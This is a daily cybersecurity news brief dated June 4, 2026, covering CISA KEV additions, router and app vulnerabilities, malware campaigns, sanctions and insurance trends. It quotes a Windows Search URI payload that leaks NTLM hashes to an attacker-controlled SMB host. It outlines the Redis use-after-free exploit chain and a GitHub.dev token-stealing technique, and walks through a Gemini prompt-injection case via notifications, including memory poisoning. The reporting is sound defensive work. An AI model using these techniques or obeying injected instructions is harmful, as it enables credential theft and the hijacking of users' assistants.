← Carolina Clear Tech

Cyber Threat Brief

2026-06-04

Listen to this brief (32:20)

Download MP3
Show Notes

Show Notes - 2026-06-04

Stories Covered

CVEs Referenced

CVE-2022-0492, CVE-2023-35636, CVE-2025-48595, CVE-2026-23479, CVE-2026-33829, CVE-2026-41100, CVE-2026-41101, CVE-2026-41102, CVE-2026-42832, CVE-2026-45247, CVE-2026-49200, CVE-2026-49201, CVE-2026-49975

Indicators of Compromise

IP Addresses: 10.0.1.100

Read the full brief

Get tomorrow's brief in your inbox

Protect Your Business

Need a security assessment? See our cybersecurity packages.

View Services

Daily Cybersecurity Brief

June 4, 2026

Today: CISA adds three actively exploited vulnerabilities to KEV with Friday deadlines, Acer warns of max-severity zero-days in Wave 7 routers that leak plaintext credentials, and Microsoft patches a debug flag left on in six Android apps that let any app on the device steal OAuth tokens and access email and files. Federal agencies have until Friday to patch Android and Linux container escape flaws, and until Saturday to fix a critical Magento RCE.

Critical Alerts

CISA Adds Three Actively Exploited Vulnerabilities to KEV Catalog

CISA added three vulnerabilities to its Known Exploited Vulnerabilities catalog on June 3, all under active exploitation. CVE-2026-45247 (CVSS 9.8) is a deserialization flaw in Mirasvit Full Page Cache Warmer for Magento that allows unauthenticated remote code execution via a crafted CacheWarmer cookie. Imperva observed attacks targeting gaming and business sites in the U.S., U.K., France, and Australia. CVE-2025-48595 is a high-severity privilege escalation bug in Android Framework affecting Android 14 through 16, with Google confirming limited targeted exploitation. CVE-2022-0492 is a Linux kernel cgroups v1 privilege escalation flaw (versions 2.6-4.20 and 5.5-5.17) that allows container escape to root-level host access, particularly dangerous in containerized environments with elevated capabilities. Federal agencies must patch CVE-2026-45247 by June 6 and the Android/Linux flaws by June 5. EPSS scores are low for the Magento flaw (0.001, 33rd percentile) but high for the Linux bug (0.263, 96th percentile), indicating widespread exploit availability.

Acer Wave 7 Routers Have Max-Severity Zero-Days Exposing Credentials

Acer confirmed two maximum-severity (CVSS 10.0) zero-day vulnerabilities in Wave 7 mesh routers running firmware T7c_GBL_1.01.000055 or earlier. CVE-2026-49200 is a broken access control flaw that allows unauthenticated remote access to plaintext web and Telnet credentials stored in the acer_cgi.log file. CVE-2026-49201 is a hardcoded AES encryption key in the upload.cgi binary that lets attackers decrypt, modify, and re-encrypt device backups to inject persistent backdoors. No patches are available yet. Acer targets a fix by end of June 2026. EPSS scores are very low (0.001 and 0.000, 16th and 7th percentiles), indicating these are newly disclosed but not yet widely weaponized.

Business & Infrastructure Threats

Microsoft 365 Android Apps Leaked OAuth Tokens via Debug Flag

A debug setting left enabled in production builds of six Microsoft 365 Android apps disabled authentication token validation, allowing any app on the same device to steal FOCI (Family of Client IDs) refresh tokens without user interaction. Affected apps include Word, PowerPoint, Excel, Microsoft 365 Copilot, Loop, and OneNote. The flaw (CVE-2026-41101, CVE-2026-41102, CVE-2026-41100, CVE-2026-42832) existed because setIsDebugMode(true) was left in a shared Microsoft SDK. With these tokens, a malicious app could read email, open files, browse calendars, and send messages as the signed-in user. The tokens refresh automatically and the activity looks routine in logs. Microsoft patched all apps in May, with Word fixed in build 16.0.19822.20190 and later. EPSS scores are very low (0.000, 12th-15th percentiles). No evidence of pre-patch exploitation exists.

Attackers Build Automated EDR Evasion Labs Using AI

Sophos analysts discovered an unidentified threat actor using AI-generated Python scripts and an automated Active Directory panel to iteratively test malware against Sophos, CrowdStrike, and Windows Defender EDR agents. The attacker ran multiple Windows Server 2022 VMs to test tools against each EDR vendor, with a fourth Ubuntu VM running a Sliver C2 server. The automated system collected observations, selected the next task from a predefined list, dispatched work to remote agents, and re-evaluated after each iteration. The attacker used Cursor (an AI-powered code editor) and Claude Opus for orchestration. Scripts were written in Russian and partially AI-generated. Artifacts show the attacker studied vendor research to identify bypass techniques, mapped them to MITRE ATT&CK, and tested systematically. The activity was connected to known ransomware deployment and data theft operations. This represents a professionalization of malware development workflows, moving from ad-hoc testing to structured engineering test cycles with human review and iteration.

CISA Warns of Cyberattacks Targeting Fuel Tank Monitoring Systems

CISA, FBI, NSA, Department of Energy, and other US government partners warned that threat actors are compromising internet-exposed automatic tank gauge (ATG) systems used to monitor fuel and liquid storage tanks in Energy, Chemical, Food and Agriculture, and Transportation sectors. Attackers gain access through authentication bypass, hardcoded credentials, OS command execution flaws, SQL injection, and privilege escalation bugs, then modify network settings, product identifiers, tank volumes, pump controls, and turn off alerts. While the advisory does not attribute the activity to any specific group, CNN reported in May that Iranian hackers were behind a series of ATG breaches at gas stations in multiple states. The attackers exploited internet-exposed systems with weak or no passwords, accessing and manipulating display readings without altering actual fuel levels. Limited forensic evidence makes definitive attribution difficult.

HTTP/2 Bomb DoS Attack Crashes Web Servers in Seconds

Researchers disclosed HTTP/2 Bomb, a denial-of-service attack that combines HPACK compression amplification with HTTP/2 flow-control stalling to exhaust server memory from a single 100 Mbps connection. A single client can consume and hold 32GB of server RAM in 10-45 seconds against default configurations of NGINX, Apache HTTP Server, Microsoft IIS, Envoy, and Cloudflare Pingora. The attack inserts headers into the HPACK dynamic table and references them repeatedly via compact indexed representations (as small as one byte), achieving memory amplification ratios up to 5,700:1 in Envoy and 4,000:1 in Apache httpd. Attackers prevent memory from being freed by advertising a zero-byte flow-control window, causing requests to never complete. Proof-of-concept exploits are publicly available. Assigned CVE-2026-49975 for Apache httpd. Fixed in nginx 1.29.8 (new max_headers directive) and Apache httpd mod_http2 2.0.41. No patches yet for IIS, Envoy, or Pingora.

Fake Sites Mimicking Open-Source Tools Deliver Malware via Traffic Distribution System

Check Point researchers identified a large-scale campaign impersonating open-source and freeware projects (including Ghidra, dnSpy, and SpiderFoot) to funnel users through a Traffic Distribution System (TDS) that delivers malware. The sites rank high in Google search results, often above legitimate project sites, and load a CloudFront-hosted JavaScript layer that converts download clicks into TDS handoffs. The TDS enforces strict gating including first-visit state, click confirmation, anti-bot logic, VPN/datacenter filtering, and frequency capping. Repeated attempts from the same IP result in benign downloads like Opera browser. The campaign has been active since at least September 2025, with TDS scripts embedded by December 2025 and active malware distribution starting January 2026. Delivered payloads include SessionGate (a new multi-stage obfuscated loader delivering PUAs), Remus Stealer (a MaaS variant of Lumma Stealer stealing from 20+ browsers and crypto wallets), and AnimateClipper (a cryptocurrency clipper hijacking transactions across 20+ blockchain ecosystems). VirusTotal shows 2,000-3,500 SessionGate submissions, primarily from Turkey, Poland, Brazil, Germany, France, Russia, and the U.K.

Stock Exchange Executive's Outlook Mailbox Compromised for Five Months

Unknown attackers maintained access to a senior executive's Outlook mailbox at a major global stock exchange for at least five months, exfiltrating the inbox in small batches routed through Dropbox and OneDrive to blend with normal cloud traffic. Symantec identified the campaign as espionage, not financially motivated theft. First malicious activity appeared October 10, 2025, with two binaries running as SYSTEM (faking Adobe updater and OneDrive). The operation kicked into gear November 12 with a Dropbox API token and a custom mailbox stealer built on Aspose .NET library. The tool converted the mailbox to PST files and ran with date-range flags, first grabbing everything from August 2025, then returning every 2-4 weeks for incremental pulls through February 17, 2026. Exfiltration used Dropbox and OneDrive Personal, with OneDrive connections to hard-coded Microsoft IPs instead of DNS hostnames to evade perimeter detection. Scheduled tasks posed as Adobe, Lenovo, and OneDrive system services. Tooling included FRPC for tunneling, Secretsdump for credentials, SharpDecryptPwd for app passwords, and a UAC bypass. Last observed activity March 19, 2026. No CVE, no attribution.

TA4922 Chinese Cybercrime Group Expands to Europe with Atlas RAT

Chinese-speaking cybercrime group TA4922 expanded targeting to Germany, Italy, U.K., and South Africa, deploying Atlas RAT and custom loaders. Previously focused on East Asia, the group now conducts more unique campaigns than any other tracked cybercrime actor in Proofpoint's data, demonstrating high operational tempo with localized phishing lures (payroll, tax audits, VAT filings, government compliance, invoices, HR). TA4922 also contacts victims via WhatsApp, LINE, and Microsoft Teams. Proofpoint assesses the group may be using LLMs to accelerate malware development based on placeholder values, code comments, and AI-generated code patterns. Atlas RAT provides system reconnaissance, file theft, payload downloads, keylogging, screenshots, audio/webcam recording, and system shutdown/reboot. The malware includes anti-sandbox checks for Microsoft Defender Application Guard, CExecSvc service, and OS UUID. New malware includes RomulusLoader (process hollowing, shellcode injection, direct execution), SilentRunLoader (Python-based Chrome credential stealer), and Winos4.0/ValleyRAT. Malware capabilities include potential for surveillance that could be used by or sold to espionage groups.

DesckVB RAT Campaign Abuses Google DoubleClick for Evasion

Huntress researchers identified a malspam campaign routing through Google DoubleClick domain to evade detection before delivering DesckVB RAT. The attack begins with an HTML email attachment triggering a meta-refresh to a DoubleClick click-tracking URL, then passes through a redirector that decodes a Base64-encoded email address and delivers a landing page with a "Download PDF" button. Clicking downloads a ZIP archive containing a JavaScript loader that extracts and runs PowerShell, which fetches a .NET loader from an external server. The loader verifies it's not being analyzed, disables security controls, establishes persistence, and uses process hollowing to inject DesckVB RAT into Microsoft-signed processes. The RAT patches AMSI and ETW at the native API level to blind Windows telemetry before establishing persistence via Run/RunOnce Registry keys and Startup folder. Capabilities include data extraction, command execution, and payload deployment. The RAT reboots the machine if it detects analysis tools or sandboxed environments. Primary targets are gaming and business sites. The campaign eliminates the need for bespoke kits per organization by dynamically pulling company branding and location details.

U.S. Sanctions Nobitex Crypto Exchange Used by Iranian Ransomware Actors

The U.S. Treasury's OFAC sanctioned Nobitex, Iran's largest cryptocurrency exchange, for facilitating payments tied to terrorist activities and sanctions evasion. Nobitex processed more than 50% of all Iranian digital asset inflows in 2025, including transactions linked to the Islamic Revolutionary Guard Corps (IRGC) and IRGC-affiliated ransomware actors. The exchange helped Iran's Central Bank access hundreds of millions in stablecoins to prop up the Iranian rial and enabled regime insiders to evade sanctions across multiple jurisdictions. OFAC also designated chairman Amir Hossein Rad, CEO Seyed Ali Khoee, co-founder Seyed Mohammad Ali Aghamir Mohammad Ali, and blockchain lead Seyed Mohammad Aghamir Mohammad Ali. The action, part of the "Economic Fury" campaign, also targeted Wallex, Bitpin, and Ramzinex. Chainalysis data shows Iran's crypto ecosystem received nearly $7.8 billion in 2025, with IRGC-associated addresses accounting for over 50% of value received in Q4 2025. Nobitex processed more than half of Iranian crypto inflows, while Wallex and Bitpin accounted for 12% and 10%. Sanctions freeze any property/assets under U.S. jurisdiction and prohibit U.S. persons from doing business with designated entities.

Windows / AD Security

Active Directory Description Fields Stored Passwords in Plaintext

The Register reported a case where all passwords were stored in Active Directory description fields, accessible to any user who could query AD. The article provides no technical details beyond the headline, but the scenario represents a common misconfiguration where administrators store sensitive information in unprotected LDAP attributes. Standard AD users can read most attributes including description fields by default. This is a policy failure, not a vulnerability.

Unpatched Windows Search URI Vulnerability Leaks NTLMv2 Hashes

Huntress disclosed an unpatched issue in Windows search: URI handler that can be exploited to steal NTLMv2 hashes, similar to CVE-2026-33829 patched in April 2026 for the Snipping Tool. The flaw uses "search:query=test&crumb=location:\\10.0.1.100\share" to trigger NTLM authentication and expose Net-NTLMv2 hashes. The crumb parameter technique was documented for CVE-2023-35636 by Varonis in February 2024 (EPSS 0.105, 93rd percentile). An attacker could craft a link in a web page or email that, when clicked and approved by the user, connects to an attacker-controlled SMB server. Captured hashes can be used for relay attacks to gain deeper network access. Disclosed to Microsoft on April 15, 2026. Microsoft declined to patch, stating the Moderate severity "does not meet our bar for servicing."

Vulnerability Disclosures

One-Click GitHub.dev Attack Steals Full OAuth Tokens

Security researcher Ammar Askar disclosed a one-click attack via Microsoft VS Code's GitHub.dev feature that allows attackers to steal GitHub OAuth tokens with read and write access to all repos, including private ones. GitHub.dev is a web-based VS Code environment launched from github.com via POST of an OAuth token. The token is not scoped to a specific repo, granting full access to every repo the user can access. The exploit installs malicious VS Code extensions that steal tokens when passed to GitHub.dev by exploiting message-passing between the main VS Code window and webviews (used for Markdown previews, Jupyter notebooks). The attack uses malicious JavaScript in untrusted webviews to simulate keypresses, open the Command Palette (Ctrl+Shift+P), and install an attacker-controlled extension that extracts the token. The exploit leverages local workspace extensions (placed in .vscode/extensions folder) that bypass publisher trust checks. Disclosed to GitHub on June 2, 2026, and made public an hour later. Microsoft acknowledged the vulnerability and deployed a fix. "This issue does not affect VS Code Desktop," per Microsoft partner software engineering manager Alexandru Dima.

Autonomous AI Tool Finds 2-Year-Old Redis RCE (CVE-2026-23479)

Team Xint Code (an autonomous AI security tool) discovered CVE-2026-23479, a use-after-free vulnerability in Redis 7.2.0+ that remained unnoticed for over two years until patches released May 5, 2026. NVD rates it CVSS 8.8 (3.1), Redis lists it 7.7 (4.0). The flaw is in unblockClientOnKey() in src/blocked.c, which fires when a key event wakes a blocked command. The function dispatches the queued command through processCommandAndResetClient(), then continues using the same client pointer after that function can free it as a side effect (a use-after-free, CWE-416). The bug required two commits to create: a January 2023 refactor (PR #11012) added the unchecked call, a March 2023 change (PR #11568) added more client access after it. The exploit chain leaks a heap address via a one-line Lua script, grooms client memory limits, frees a blocked client mid-call, reclaims the freed slot with a fake client structure via pipelined SET, then uses Redis's memory accounting to perform an out-of-bounds decrement to overwrite a GOT function pointer, redirecting strcasecmp() to system(). Official Redis Docker images ship with partial RELRO, leaving GOT writable. The attack needs @admin, @scripting, @stream, and @read/@write ACL categories (all granted to default user). Wiz analysis puts Redis in a majority of cloud environments, most running without passwords. Fixed in 7.2.14, 7.4.9, 8.2.6, 8.4.3, and 8.6.3 (May 5, 2026). No evidence of in-the-wild exploitation yet.

Google Gemini Prompt Injection via Android Notifications

SafeBreach researchers disclosed a prompt injection vulnerability in Google Gemini's voice assistant on Android that allowed attackers to hide malicious commands in instant messaging notifications. The flaw exploited Gemini's Utilities feature, which reads and replies to notifications from WhatsApp, Slack, SMS, Signal, Instagram, and Messenger. Gemini treated notification text as instructions, allowing any app that can push a notification to deliver a payload. Attackers could rewrite Gemini's output, fake messages from trusted contacts, control smart home devices, launch unauthorized video streams, conduct social engineering, and poison long-term LLM memory. The bypass technique, called Fake Context Alignment, ran two illusions: a legitimate-looking authorization for the security check (in a foreign language like Chinese) and a harmless exchange in English for the human. The authorization question was hidden in a muted hyperlink that Gemini's text-to-speech skipped. SafeBreach responsibly disclosed the issue to Google, which rolled out content classifier updates. No CVE assigned. No evidence of in-the-wild exploitation. The attack vector is Android-only, not available on iOS or web.

General Security News

Open-Source AI Models Used to Build Self-Spreading Worms

The Register reported on research demonstrating that free open-source AI models can be used to build chaos-causing computer worms without requiring proprietary models like Mythos or zero-day exploits. The research shows attackers can now cheaply operationalize known vulnerabilities at scale using publicly available LLMs. While the article headline emphasizes the worm-building capability, the key takeaway is that AI lowers the barrier to entry for automating exploitation of known vulnerabilities rather than discovering new ones.

Cyber Insurance Rates Drop but Exclusions Widen

Gartner analyst Paul Furtado outlined shifts in the cyber insurance market at the Security & Risk Management Summit. Pricing has stabilized and carriers are providing discounts for demonstrable security levels, but coverage exclusions are expanding. New exclusions include employee actions, outdated software, failure to maintain security controls, and M&A activity. Employee actions exclusions may cover social engineering attacks like ClickFix, where attackers convince users to run malicious commands. Huntress reported ClickFix-style attacks accounted for 52% of cyberattacks seen in 2025. War clauses and mass cyber event clauses could reduce payouts by up to half. Policies now require "very specific conversations" with carriers to understand coverage gaps. Sub-limits and tail coverage structures have also changed, with $100M+ policies now requiring panels of insurers rather than single-carrier coverage.

Police Dismantle 9 Crime Groups in Illegal Streaming Crackdown

European and international law enforcement from 13 countries dismantled nine organized crime groups and arrested 29 suspects in Operation KRATOS 2, a seven-month crackdown on illegal streaming coordinated by Bulgaria with Europol support. Authorities identified 18,000+ IP addresses, 4,370 domains linked to piracy, 400,000 URLs flagged for suspension, and 126,000 infringing objects. The operation removed 27,000+ illegal streaming URLs for sports, film, and TV content. Investigators identified 86 suspects, conducted 148 house searches, referred 59 cases to judicial authorities, and are working on 72 criminal investigations. Criminal groups separate customer-facing websites from content-hosting servers across jurisdictions to evade detection. Europol warned that illegal streaming services expose users to malware, spyware, and data theft risks beyond generating criminal revenue.

Patch Priority

Trends & Context

Today's brief highlights the convergence of AI-accelerated threat development and traditional attack vectors. Attackers are using LLMs to automate EDR evasion testing and generate malware faster than defenses can adapt, but the fundamentals remain unchanged: timely patching, MFA, and defense-in-depth still work. The three CISA KEV additions underscore the criticality of sub-48-hour patching windows for actively exploited vulnerabilities, particularly in internet-facing applications like Magento and mobile platforms like Android. Debug flags left in production (Microsoft 365 Android apps) and hardcoded credentials (Acer routers) demonstrate that basic secure development practices still fail at scale, even at major vendors. The rise of prompt injection attacks against LLM assistants (Google Gemini) signals a new attack surface that defenders are just beginning to map.